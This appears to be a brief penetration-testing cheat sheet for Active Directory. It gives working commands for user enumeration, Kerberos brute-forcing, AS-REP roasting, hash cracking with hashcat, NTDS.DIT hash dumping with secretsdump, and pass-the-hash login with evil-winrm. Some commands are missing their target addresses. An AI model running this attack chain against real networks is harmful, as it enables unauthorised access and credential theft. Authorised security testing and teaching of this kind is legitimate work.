While pentesting a Windows network some tools and essential to have handy:

  • Enum4Linux – Quick enumeration.
  • Kerbrute – Enumerate domain users.
  • Impacket – Parsing SMB and NetBIOS packets.
    • ASREPRoasting attack – Enumerating used with no password required.
      • HashCat – Cracking Kerberos hashes.
    • SecretDump – Dumping NTDS.DIT hashes.
  • Evil-WinRM – Logging in passing hash (no password).
  • SMBclient – Enumerating shares.

Quick enumeration Users, Groups, Shares… with Enum4Linux [Link]:

/usr/share/enum4linux/enum4linux.pl -a
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse

Kerbrute – Brute forces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication [Link].

There is also a short-handed repository for it that I recommend using:

git clone https://github.com/Sq00ky/attacktive-directory-tools.git
cd attacktive-directory-tools && chmod +x kerbrute
./kerbrute userenum --dc -d domain.local user.lst

Installing Impacket – Tool able to parse packets from low to high-level protocols, excellent for SMB and NetBIOS analysis:

sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo python3 ./setup.py install

ASREPRoasting attack using Impacket – Looks for users that are set to do not require pre-auth:

python3 /opt/impacket/examples/GetNPUsers.py domain.local/admin -request -no-pass -dc-ip

Cracking Kerberos hashes obtained from the ASREPRoasting attack:

hashcat --force -m 18200 -a 0 svc-admin.hash /usr/share/wordlists/rockyou.txt

Enumerating shares for a particular user – Knowing the password is required!

smbclient -U domain.local/admin -L //
smbclient -U domain.local/admin //
get file.txt
smbget -R smb://

Dumping all NTDS.DIT hashes with Impacket:

python3 /opt/impacket/examples/secretsdump.py -dc-ip domain.local/share:[email protected]

Authenticating by passing a dumped hash (no password required using Evil-WinRM:

sudo gem install evil-winrm
evil-winrm -i -u administrator -H 5f4dcc3b5aa765d61d8327deb882cf99